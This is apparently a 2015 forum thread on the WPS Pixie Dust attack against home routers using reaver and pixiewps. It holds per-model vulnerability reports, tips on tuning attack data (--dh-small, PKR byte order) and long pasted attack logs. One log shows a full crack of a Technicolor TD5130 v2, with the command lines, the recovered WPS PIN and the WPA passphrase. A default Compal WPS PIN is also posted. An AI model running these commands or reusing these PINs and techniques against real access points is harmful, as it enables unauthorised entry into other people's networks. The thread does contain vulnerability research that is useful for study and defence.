I added a new Realtek video demo... "WPS Pixie Dust Attack: Automatic Ralink/Realtek/Broadcom" for those of you having trouble. Can't post youtube videos so you'll just have to search for it.
I added a new Realtek video demo... "WPS Pixie Dust Attack: Automatic Ralink/Realtek/Broadcom" for those of you having trouble. Can't post youtube videos so you'll just have to search for it.
I couldnt find the video yet, even under your name/channel. Probably not finished uploading.
Is the new pixiewps ready? with more realtek support?
Not all the realtek support. It's still under development but the process will be the same. If it doesn't turn up a pin the first time you try it against Realtek, run it again. I had the problem in the video but didn't want to cut it cuz then people would think its fake.
Btw, I use pixiewps right from Wiire's github, not from the Kali repos.
Last edited by soxrok2212; 2015-04-20 at 22:04.
Nice video !!!
Greet work all involved.
Pixie Dust Data Types and successful WPS pin extraction.
There are(2) two types of Pixie Dust Data Sequences:
When --dh-small is used in the reaver command line the -PKR sequence is fixed and not variable.
When --dh-small is not use the -PKR variable constantly changes.
Musket Teams have come across routers where --dh-small sequences did not provide the WPS Key while the same reaver command line without the --dh-small in the command line thus -PKR was variable, provided data that DID extract the WPS Key.
MTeams suggest that if you run a --dh-small attack and do not acquire the WPS key from the data, remove the --dh-small from the reaver command line, collect some more Pixie Dust data sequences with a variable -PKR and try again.
MTeams Labs
I just want to point out that the tool is not completed yet, it works only (for Realtek) if the 3 nonces are generated within THE SAME second. So we can't be sure wether --dh-small cause bugs. I think you should try to supply the right pin with Reaver to the AP using --dh-small. If it works and the AP goes past the M3 then it should means that it works with --dh-small too (unless there's a bug in my code lol).
To wiire
Further PKR corrections when using --dh-small in the reaver command line
Musket Teams noticed that the PKR variable when --dh-small is employed in the reaver command line should normally be a long series of zeros ending with :02. Total string length is 575. However in all the output provided by the modded reaver, the PKR variable when dh-small is used show the 02 at the beginning of the string and the key is never found
MTeams moved the 02 to the end of the PKR String and the WPS key was immediately found.
In these cases if the key is not found then transpose the 02 to the end of the string when --dh-small is used OR remove --dh-small from the reaver command line and collect new data with a variable PKR.
Musket Teams Labs
PKr gets printed in little-endian when using small keys (only). When adding the lines of code to print PKr I didn't test with -S, ops. If you sniff the traffic with Wireshark you see it's OK. BTW if you use pixiewps with small keys (-S) the program will automatically set PKr = 2 (00: ... :02).
That's beacuse with small keys Reaver sets its private number = 1. Thus: g^A mod P = 2^1 mod P = 2 (P is a huge prime number > 2).
Anyway now the recommended version of Reaver is the one made and mainteined by t6_x and datahead (which prints it right). I updated the link to my original post.
Last edited by wiire; 2015-04-21 at 14:16.
uhm, anyone had any luck with atheros chipsets yet?
some updates for the database ;-)
Compal CH6640E
Realtek RTL8192CE
After successful PIN-Test reaver brings for PSK + SSID "(null)" ?
So, what else, its some kind of VULNERABLE .
Code:[P] E-Nonce: 07:ee:41:56:16:0a:54:d7:0d:c7:1e:a9:43:83:c1:a0 [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] PKR: c6:5a:4c:48:87:b9:24:fb:b3:f8:0f:de:b4:4c:cc:82:23:cf:6c:55:2b:4c:d8:a3:a8:c8:a8:da:aa:ba:28:ab:c8:95:d1:aa:04:a2:10:f8:01:31:62:40:46:e0:cc:a8:6c:07:9a:8c:5f:5c:1e:c5:13:53:c7:69:cc:55:ce:0a:de:38:27:a1:9c:75:e5:09:e9:55:71:5e:60:3d:e7:a4:6f:88:60:4e:da:8e:de:c3:74:48:fb:ad:8a:16:77:2b:0d:4f:d6:cc:5d:85:0e:59:44:a9:de:3f:85:a1:49:80:ec:88:79:b2:4e:00:8a:6b:a5:db:27:62:3c:59:d8:e9:8f:f4:3e:09:76:74:5f:10:99:d1:33:39:69:a7:c6:2a:aa:60:29:1b:9c:5f:4f:d4:b2:a2:08:cd:67:d0:de:59:12:be:24:9e:69:6e:f0:a7:6b:70:2d:4f:db:5a:b5:cb:36:2b:44:4a:c7:e0:42:50:a8:6c:d4:a5:da:e4:46:51 [P] AuthKey: a1:3d:2a:8b:ce:3a:27:e2:09:11:f8:63:e4:95:c1:c9:18:0e:2a:9b:fa:f1:06:b4:88:a0:d4:63:98:04:44:f5 [P] E-Hash1: 5c:b7:48:b9:b2:cc:1f:5b:17:5b:f3:c6:ce:ca:83:c1:9e:c2:08:f6:bf:35:de:3f:cd:0f:34:80:b9:6e:16:51 [P] E-Hash2: 45:2a:e1:1e:2e:f7:c9:9d:a2:7a:c3:d8:c0:02:0e:aa:2d:f8:18:2d:28:61:78:93:bd:e2:a2:09:31:f3:f5:1e
NOT VULNERABLE:
TP-LINK TL-WR740n v1/v2
Broadcom BCM5356
NOT VULNERABLE:Code:[P] E-Nonce: 28:68:6d:cf:7d:d7:09:e4:72:3b:c3:51:be:27:a6:16 [P] PKE: 85:c2:b7:ed:9a:a8:04:39:8e:7e:cd:1c:f3:c3:df:e6:7e:07:91:cc:80:98:56:38:8d:e1:b7:42:57:7f:62:e2:a0:39:8f:e3:84:48:ce:10:87:66:a7:5b:91:d2:b5:8e:ec:cb:4c:8c:96:5a:c7:66:11:61:e5:78:42:55:3a:65:8d:ef:b1:d2:69:e7:ce:06:a3:b4:36:bd:c1:e9:2c:e8:46:2d:44:e3:93:66:c6:48:85:a0:ac:14:ee:11:b7:76:68:61:0a:ef:be:ed:a3:19:31:70:68:c2:fb:eb:65:c6:44:6a:02:d6:fb:25:8e:6a:10:2f:38:8a:a5:a6:de:c3:69:f9:b0:2b:0a:2b:ce:12:a8:4f:b6:dc:be:48:c0:d7:28:08:d8:4d:10:e7:89:9b:15:54:10:d3:a0:25:d1:da:7c:48:2d:22:87:e1:8d:2b:2b:f6:0f:3f:ab:14:3e:8d:ab:c5:5a:b8:8b:4a:a4:60:38:6b:dd:66:25:c1:ca:1e [P] PKR: 2e:56:24:ad:1d:7e:77:0f:a8:b9:fd:6b:4b:9b:ed:38:23:e7:44:c8:72:ef:ea:5e:57:bd:6a:a4:05:31:8b:70:81:30:03:80:cb:83:f5:ba:81:68:69:b1:cb:cf:d1:d4:86:8d:d0:25:1c:0d:03:b1:8f:47:4e:1b:3f:01:ec:62:c2:51:e4:6a:54:59:96:e0:7c:72:0a:bf:64:2d:de:cf:d8:49:f5:ca:ae:88:5a:d1:ff:9f:ac:ff:32:9a:fb:33:64:fa:2f:44:93:aa:56:64:e4:9d:41:3e:3a:44:99:53:1d:f6:b3:b4:82:94:fa:dc:aa:a1:56:61:0b:d5:80:48:e3:5d:53:d2:36:fb:6f:85:8a:9c:08:af:62:1a:0b:ea:23:70:b3:63:0a:ea:4f:3e:62:7c:5d:ba:11:2d:41:9c:4f:3e:18:2c:fd:94:11:ad:a3:8c:c9:75:11:da:a3:ee:62:84:36:03:fc:bd:a5:b5:b3:0e:73:81:4b:61:7d:3f [P] AuthKey: cc:e9:3a:92:e6:1c:dd:a2:ab:92:d7:f3:13:a0:d3:67:92:cd:75:7b:19:f6:9a:44:18:77:e6:17:ee:5c:33:3a [P] E-Hash1: 83:90:f2:7e:17:5d:44:c4:38:c3:4e:cb:bc:80:92:0d:77:b3:40:97:35:d5:9b:9a:da:a4:10:49:1b:b4:0f:07 [P] E-Hash2: e2:c2:90:1e:c2:21:ac:c4:4e:48:b6:4a:d9:cc:67:b1:e1:67:7e:01:5e:af:33:53:40:fc:07:2a:ef:a1:d5:29
Belkin F7D1301 v1
Broadcom BCM5356A1
Code:[P] E-Nonce: 84:87:88:e4:b0:9c:15:6c:20:cc:36:58:40:7c:83:6d [P] PKE: 17:17:85:b8:2d:a4:54:d8:55:85:e2:0e:78:f2:94:56:29:b4:d8:d6:f8:d6:9b:43:1c:d8:b5:c7:49:dd:e6:43:d9:43:f8:bb:8a:aa:54:94:b8:01:7f:67:81:95:92:c1:9d:f6:4f:9c:0a:db:83:b4:23:2f:b6:61:7d:01:67:8f:10:30:94:e7:d7:f5:db:bd:ea:44:cb:92:ec:00:a3:02:73:c5:5b:c7:13:e0:88:a0:49:af:7a:15:55:69:ba:06:aa:b4:49:a5:10:f7:1d:cc:b6:ad:f5:09:05:77:05:10:5e:3b:5a:a9:83:98:0f:d8:0b:76:d0:db:4f:1e:e7:0d:81:7b:37:23:bb:9f:1b:c5:13:ad:98:fc:af:29:bf:91:6a:ef:1d:ef:f4:74:29:b7:de:8f:9d:8c:a4:4f:dc:98:90:26:13:30:3b:9e:db:d6:bd:b7:25:a3:0e:31:69:ab:e7:bb:bd:b5:48:9d:c6:aa:a0:95:b3:9f:10:02:e3:a0 [P] AuthKey: a6:27:f5:13:be:0c:41:cc:24:1c:c3:a7:c7:99:20:48:c9:dd:b0:51:82:a0:51:29:2b:7b:2e:18:8b:76:fc:24 [P] E-Hash1: c4:0d:69:f7:ca:eb:50:5e:e9:84:8f:ab:0b:21:2b:5c:fa:90:21:f6:a2:98:9a:ef:ef:12:a5:5e:3c:d3:61:a4 [P] E-Hash2: 86:94:0c:25:ea:ac:32:15:7a:71:2a:66:50:b3:e7:3a:c6:3d:02:1a:7a:4f:74:71:87:f3:df:54:ba:b4:21:98
NOT VULNERABLE:
ASUS RT-AC66U
Broadcom BCM4706
Code:[P] E-Nonce: cf:93:1f:a3:6e:ac:6d:76:45:54:a3:06:cc:2d:36:2b [P] PKE: 24:b3:71:23:bb:44:69:98:6a:d5:a6:e4:99:a5:5f:6d:c6:75:e6:87:6e:50:ca:b6:88:13:c7:a3:b3:1f:5b:66:16:70:ee:a8:1a:33:08:0c:e9:98:28:cf:6d:54:d3:f9:52:73:5d:7a:10:0c:84:9c:81:74:2e:ec:85:d9:be:d6:75:49:bf:78:d9:a0:da:86:1b:9a:50:a4:5f:ea:f8:fc:68:b8:a4:a3:9c:bc:87:92:a4:a1:17:8f:00:76:39:9a:d5:33:01:41:86:7d:e5:83:ca:06:6d:6c:a7:ae:10:94:55:fb:74:23:e1:7a:d3:35:e5:62:1d:4c:c4:e6:cf:47:ff:ea:1d:b3:ce:03:b7:32:42:f7:c7:bb:bc:eb:94:03:71:86:04:63:6f:b2:97:36:40:b1:3b:b1:80:25:5c:70:90:79:a7:4e:3f:c4:b8:ad:e5:8c:ff:c7:65:a6:3a:95:fc:40:6a:8a:f9:80:ef:18:6b:d4:6d:40:6e:e3:ae:2a [P] PKR: 23:3a:61:72:e4:59:9f:bd:f4:70:b6:5a:e9:6b:d4:e2:28:14:ed:ca:38:89:c0:4e:77:b6:22:78:3d:74:99:fe:cd:52:d6:e1:ea:14:06:2e:86:f4:9b:77:4c:0e:a9:b3:06:56:0b:4a:11:d1:46:4c:62:b6:56:cf:61:98:2d:e7:95:3a:1e:01:e5:b0:50:12:a0:36:c5:4a:e1:d1:68:50:8a:c3:f5:de:5a:2b:ce:82:62:41:81:6a:a2:9b:0f:14:63:b1:0b:f0:db:82:19:2f:5a:6a:a5:b2:9d:cd:f1:36:fb:e6:ad:13:77:79:bf:77:80:b3:72:6e:d7:76:62:dc:1d:ca:81:a1:f8:f3:56:c7:f1:92:59:70:ca:db:2c:43:16:db:ea:a6:3a:40:6f:59:9c:b8:3e:db:e6:21:11:21:38:9e:d8:2c:e0:df:85:40:4d:4e:a7:93:e3:ee:eb:f8:25:c9:98:c0:e8:49:8b:6e:b3:c4:1a:f9:72:18:a4:53 [P] AuthKey: 64:9b:23:3a:c5:4d:84:1b:9d:8d:ef:49:64:d4:02:de:7d:b0:73:7b:c1:28:61:69:7f:a1:0e:b6:11:59:1c:d6 [P] E-Hash1: 45:32:81:a0:27:f4:2e:b5:e7:31:27:79:ed:ae:0c:d7:a9:22:66:9f:43:8d:07:a0:a4:23:03:55:c6:e7:ea:d3 [P] E-Hash2: d1:5a:cd:32:79:52:73:4a:d5:83:96:1b:59:9b:76:5f:d3:5f:77:d8:1a:d8:86:7e:d9:d3:46:03:f2:b7:1b:3d
Sweet thanks! Just updated everything.. should be all set
Not vulnerable:
ZyXEL VMG3312-B10A
[P] WPS Manufacturer: ZyXEL
[P] WPS Model Number: VMG3312-B10A
[P] WPS Model Serial Number: 96368GW
Code:[P] E-Nonce: 10:74:5a:93:5d:0c:e9:38:fb:27:0d:2c:44:6a:47:aa [P] PKE: bf:ce:38:9a:76:34:e7:62:2a:09:72:5d:12:04:e0:1b:c3:94:1b:38:d5:6f:9b:bc:1e:fe:48:17:26:62:6f:27:b1:53:50:e1:d7:0d:65:09:30:90:4f:fd:80:4c:eb:c5:5b:9c:f8:c6:e0:66:79:10:72:91:32:e6:a5:93:ce:90:3b:5c:c3:8c:be:97:fd:a3:ca:65:44:98:fc:5b:92:ae:ca:dd:56:42:d0:72:dc:66:1c:89:c6:9d:d1:07:0a:40:dc:88:76:60:c5:55:20:75:d6:83:5a:19:37:e9:9f:df:35:72:66:b7:ca:94:e3:cd:75:30:2a:27:dc:03:97:fa:3b:a3:3d:52:3f:4a:47:f5:07:76:02:d9:68:a2:41:5f:5a:04:2c:00:74:c5:e5:8a:a8:ea:c3:f0:c3:af:d8:a4:fa:8a:70:5c:9d:48:b2:e3:f4:2e:57:7c:a3:23:0f:88:c7:10:4b:cf:6e:aa:1e:cc:65:92:f6:30:16:dd:76:db [P] PKR: d6:35:6a:d5:96:cb:22:1f:dc:8e:3e:36:98:81:3c:26:f4:73:27:7c:00:f4:0a:0f:4d:5e:ff:e0:3f:a7:24:d1:6e:39:00:7e:65:cd:f6:10:f9:63:4a:47:54:a2:83:f0:4b:4d:61:8a:6b:0f:f6:3c:c9:fb:30:b7:d5:6a:cd:60:6a:26:37:e1:19:d9:e1:a4:62:44:c9:05:8c:65:04:d5:9f:e0:04:06:5e:5f:2d:1d:01:42:69:c7:a2:01:76:c0:71:87:6d:f0:11:36:e4:9c:6c:61:0f:5a:82:06:e7:f8:b8:f0:f5:3a:5f:6b:ad:6e:7b:a2:73:b5:a3:b3:45:9e:b4:17:c9:4b:4f:03:25:ea:a5:9d:ff:85:6c:15:53:b1:58:7a:c2:c6:fb:b1:96:34:44:9a:c7:38:e4:99:b4:27:7c:12:90:84:a4:94:4f:d9:79:df:2d:44:7e:8d:98:e0:1f:bf:42:19:a2:53:ee:8c:39:d5:57:e4:85:b2:09:e2 [P] AuthKey: 75:2f:50:4b:1f:e5:69:92:8d:f5:9e:3f:6c:29:47:7e:87:0d:2d:6e:ba:71:c8:ae:23:00:e7:ff:f7:a5:d0:94 [P] E-Hash1: 30:b0:f8:c1:d0:ae:d1:72:bc:65:46:65:94:a3:8d:09:47:82:78:ed:bd:2e:db:b8:49:4a:7e:19:7d:e7:8f:05 [P] E-Hash2: 5e:b9:8b:28:34:79:09:d5:b5:99:48:34:14:78:3c:ea:f2:ef:0a:a2:ac:c4:5a:97:1e:a7:41:4d:6e:36:5c:e3
Last edited by SubZero5; 2015-04-22 at 08:47.
@ soxrok
please update the Chipset from Hitron CVE30360. The correct one is RT 3352F
And a new one for the Database:
NOT VULNERABLE:
TP-LINK TL-WDR3500
Atheros AR9340 / 2.4GHz
Atheros AR9300 / 5GHz
Code:[P] E-Nonce: 1f:e5:c5:65:01:98:8c:c8:af:d5:40:33:5e:65:bc:8c [P] PKE: 32:37:af:a7:a7:a7:f4:48:cb:31:a2:8c:c5:7b:50:68:be:a1:04:cc:28:5d:56:2c:e3:9b:c1:52:99:7e:b7:26:7b:0e:0b:d1:c2:57:22:1f:53:88:4d:79:98:8d:44:5e:3a:65:9b:e3:36:cc:3a:10:57:af:f4:f0:db:c1:02:14:0c:57:31:23:26:27:9c:c2:b3:7e:fd:8c:f1:ff:8c:a9:f9:04:2d:0a:46:09:c6:3b:97:75:04:8c:57:16:34:2e:4e:ef:01:12:e6:cc:e2:12:86:6b:a5:26:78:7b:23:73:6f:96:5f:03:8f:fb:c8:73:ab:5d:0f:dd:e4:58:91:c2:30:f5:84:a8:fe:39:eb:88:4e:e9:c0:5e:f4:3c:a2:60:8a:cc:40:8f:b1:1c:9c:bd:49:51:18:9e:93:54:70:e5:20:8d:85:0d:4f:66:fe:2f:7a:e3:c4:84:15:39:18:4d:8f:35:83:1f:e7:23:e5:4a:f7:34:7e:da:36:0f:21:8f [P] PKR: 48:58:5f:0a:01:9a:e1:ac:8f:0c:e8:9e:c4:16:9b:c7:0c:03:02:f9:29:fb:2e:a3:6a:39:d1:87:76:e2:b5:fc:dc:44:e2:72:31:f2:75:42:af:13:33:ce:6d:a8:e0:87:2d:2f:ee:fa:27:6a:1c:0f:e7:4d:de:73:42:e8:b0:43:44:72:4b:f2:86:c9:f7:8d:47:fe:80:30:35:5a:5c:44:f7:a9:5d:41:66:79:2c:7b:2a:b8:e9:f4:a5:29:93:48:f7:57:e8:f2:fc:02:ba:6a:8b:dc:89:a5:32:f1:eb:a6:b2:64:83:c4:5a:b5:a3:96:c0:ab:25:ec:f7:2e:e2:7e:71:bd:36:c7:d0:15:89:4c:b9:e9:20:d9:23:67:c4:d4:03:5c:29:74:72:a0:c8:57:b4:8d:1e:15:c9:3e:75:84:8f:cb:c4:3a:f2:ed:fc:2e:d7:a6:31:c7:4c:01:d2:cd:ad:7a:2b:ef:4a:1c:b1:e7:44:dd:7d:77:5a:99:06:7b [P] AuthKey: 01:ff:58:b8:ea:a8:d9:e1:a0:f0:7f:31:93:9b:d2:c8:0b:c8:98:35:72:16:4b:da:29:98:e2:bd:04:9c:37:10 [P] E-Hash1: 27:7d:37:15:b0:ca:7c:dd:45:56:0f:a9:83:26:fa:a8:85:74:9c:44:99:77:d2:a3:99:26:e0:33:8b:be:86:a3 [P] E-Hash2: 51:d0:4c:00:a2:b2:bc:01:dd:6f:d9:4c:32:76:33:3e:82:cc:72:14:e8:a0:b9:64:30:36:df:2c:95:e9:83:1f
hi soxrok2212 what about technicolor TD5130? is there any method to crack it
your news version it works in TD5130 v 2 ..but TD5130 V 1 no a will wait a new video for all chipset realtekk
I am not success with this AP, Do you need me gather more any infomation ?
Doesnt work in uk talktalk super router
broadcam chipset huawei model
I confirm it's working on Technicolor TD5130 v2... :
..But not on TD5130 v1 :Code:wifislax ~ # reaver -i mon0 -b A6:25:89:XX:XX:XX -c 1 -K 3 -P Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> mod by t6_x <[email protected]> & DataHead & Soxrok2212 [+] Waiting for beacon from A6:25:89:XX:XX:XX [+] Associated with A6:25:89:XX:XX:XX (ESSID: TNCAPxxxxxx) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [P] E-Nonce: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] WPS Manufacturer: Realtek Semiconductor Corp. [P] WPS Model Number: EV-2010-09-20 [P] Access Point Serial Number: 123456789012347 [P] PKR: 44:7c:98:9e:94:47:e5:bc:22:0e:4f:b9:19:86:18:3a:35:e9:70:8c:6d:97:a3:81:53:08:1b:22:4c:4a:fd:0a:2a:a0:b9:37:de:31:86:2f:63:a1:2c:75:35:10:d9:2b:e3:8f:b7:6b:57:c9:58:fd:e8:0e:bf:87:44:08:23:84:ca:85:ec:2d:53:f3:27:cd:d5:a5:e7:93:9f:3a:7a:66:d3:c4:f1:eb:d4:e9:6c:60:ce:63:12:bc:ac:04:1e:ca:fd:ab:cf:b0:a4:d3:ad:39:f5:bd:1e:b2:c1:93:34:9d:b7:8b:cc:98:c9:3e:90:d6:08:c0:08:18:51:d3:ff:5f:6a:a5:32:a5:d3:5f:7d:48:bb:4f:f1:bc:eb:ac:95:22:8f:da:e3:a2:46:b9:52:3c:ff:95:db:95:a9:0c:28:30:f8:68:97:9a:a7:66:02:9c:11:da:ab:3d:7d:b7:30:ab:a8:69:c5:07:f5:da:da:e3:3b:36:7e:f0:97:80:7b:27 [P] AuthKey: 04:b8:0b:ef:4b:f1:12:76:23:39:2d:f6:32:bb:c3:57:15:45:17:c9:46:e3:a0:3b:44:80:2e:83:16:d8:1e:22 [P] E-Hash1: e6:0e:1b:5f:e2:f1:bc:eb:1e:f7:c4:1d:69:97:3a:ea:3b:81:25:aa:64:4a:23:11:cb:cd:52:8e:c3:78:39:9a [P] E-Hash2: b9:f4:db:b2:08:1b:31:43:6e:70:9f:ca:cb:4d:bb:5d:0a:fc:86:5b:a4:76:33:e6:e0:cd:1b:b9:05:2f:d1:ce [Pixie-Dust] [Pixie-Dust][*] ES-1: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a [Pixie-Dust][*] ES-2: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a [Pixie-Dust][*] PSK1: 49:40:f7:f2:af:67:5a:50:81:12:b6:27:82:2f:35:3b [Pixie-Dust][*] PSK2: d7:c0:5c:8d:60:9a:a6:cc:c0:fe:9e:6c:36:77:04:84 [Pixie-Dust] [+] WPS pin: 99280710 [Pixie-Dust] [Pixie-Dust][*] Time taken: 0 s [Pixie-Dust] Running reaver with the correct pin, wait ... Cmd : reaver -i mon0 -b A6:25:89:XX:XX:XX -c 1 -s y -p 99280710 [Reaver Test] BSSID: A6:25:89:XX:XX:XX [Reaver Test] Channel: 1 [Reaver Test] [+] WPS PIN: '99280710' [Reaver Test] [+] WPA PSK: '18D189E728' [Reaver Test] [+] AP SSID: 'TNCAPxxxxxx'
So we're waiting for a new update of Pixie, and I hope it'll be very soon...Code:wifislax ~ # reaver -i mon0 -b 00:18:E7:XX:XX:XX -c 1 -K 3 -P Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> mod by t6_x <[email protected]> & DataHead & Soxrok2212 [+] Waiting for beacon from 00:18:E7:XX:XX:XX [+] Associated with 00:18:E7:XX:XX:XX (ESSID: TNCAPxxxxxx) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [P] E-Nonce: 55:b3:65:81:7c:d3:2a:9b:72:bf:d2:23:58:93:d9:88 [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] WPS Manufacturer: Technicolor [P] WPS Model Number: Technicolor TD5 [P] Access Point Serial Number: 1209A1D12783 [P] PKR: 2f:97:c1:c5:de:cd:d7:b5:15:ef:8d:bb:e1:53:7c:9f:5c:3d:d2:48:63:a2:d2:ec:1b:88:69:27:44:d2:be:4f:b6:a6:b8:07:5b:10:8c:a1:a7:01:ea:b7:f0:71:a9:90:31:78:f4:16:8f:4b:6b:0a:89:48:70:18:ad:93:f7:a7:4f:46:37:ee:50:cb:64:5f:c6:ec:a4:10:5f:ef:a5:90:0c:3b:e3:b3:50:e9:2a:6b:ea:ce:b4:c4:7f:51:be:ae:59:45:a8:17:a3:8e:9f:6a:05:9e:6f:8b:76:c4:30:9f:bc:c1:b6:76:2b:6d:dd:4e:3b:26:6c:c9:f5:eb:c6:49:eb:9d:a3:ae:64:5a:f5:87:88:46:ff:30:3e:87:1a:e0:12:89:81:7f:6e:f3:a2:8b:f5:66:47:66:ab:71:0b:1f:4d:de:9f:d9:d7:c4:cc:c5:73:65:93:75:dd:89:ec:43:b0:2e:7e:51:46:1f:79:ee:70:4b:de:26:8a:21:6c:99 [P] AuthKey: f1:63:8a:98:70:5b:6b:9b:fc:e5:f7:69:c9:a8:fd:01:9c:b8:81:e9:c7:07:44:60:98:f1:c1:70:62:d0:65:f4 [P] E-Nonce: 5f:a2:06:2d:1c:01:6b:cc:67:7e:f6:e7:53:df:38:01 [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] WPS Manufacturer: Technicolor [P] WPS Model Number: Technicolor TD5 [P] Access Point Serial Number: 1209A1D12783 [P] PKR: 1e:4c:22:6d:a7:ce:f8:b7:d0:16:83:76:33:6b:8f:4f:b1:9e:6c:8a:a6:7d:6a:4a:14:8e:4e:5b:2e:fa:e5:4e:a1:b2:d0:a0:65:75:16:a6:10:60:27:8d:31:74:4b:e1:4e:0e:18:2d:f2:ae:10:3f:2f:14:ff:51:75:24:8b:d3:6a:a4:23:72:7d:d8:bb:63:6b:89:c9:22:0f:32:e3:1b:bb:2b:b6:3c:8a:b3:4f:c7:a1:4b:fc:d2:4c:73:9c:1d:3f:ae:6d:aa:3f:f0:a0:84:51:e2:1f:ca:91:f5:89:44:47:48:3c:23:6e:e0:b5:22:f3:c7:9c:db:3f:91:82:78:9f:73:4a:dd:38:00:f4:ee:a9:4f:ce:4a:4c:e8:3f:87:9f:e6:3a:a9:07:90:31:05:09:a7:7d:3f:e6:03:70:44:61:f8:20:cc:47:c3:15:dd:50:52:54:ee:99:c4:85:7e:8a:64:8f:0f:60:16:3a:ed:3c:8d:d9:17:3e:ca:22:62 [P] AuthKey: f7:94:e0:53:05:c6:92:37:13:8c:d8:04:54:3a:42:5e:5f:8f:4f:28:ae:7a:51:9e:91:3e:69:e8:f6:c8:68:43 [P] E-Hash1: 51:6d:e5:bc:37:d0:ae:bb:de:b8:6d:91:40:b4:55:1a:c0:15:a1:32:29:1a:c3:66:9f:3e:6f:38:39:3c:ee:95 [P] E-Hash2: c5:e2:df:28:ed:50:8d:69:31:e9:85:9e:1b:68:12:18:cf:c7:1f:f7:f8:41:f4:01:b3:5a:8e:83:a3:24:9e:96 [Pixie-Dust] [Pixie-Dust] [-] WPS pin not found! [Pixie-Dust] [Pixie-Dust][*] Time taken: 1 s
pixiewps inst installing.
it shows problem in line 46:26
after that it also halts on 'SHA1' line.
any way to solve it...???
im running kali in live
Do me a favor, because this isn't the first time I've seen such a thing. Log into one of them and look under the WPS settings... tell me if a different PIN is also listed there and then try it in reaver/bully Please
Hi,
checked three of them, each one has as Default-PIN 47385580 in WPS Settings.
For 7 Models with Reaver --> PSK + SSID "(null)", only one shows SSID and PSK. Bully delivers both Values correctly.
Btw: In your Pixie-Database is a second Compal-Device listed (CBN-106-145-065). Those CBN-xxx-xxx-xxx number is different at each Router i've tested. So its probably the same Model.
Here are 5 of them:
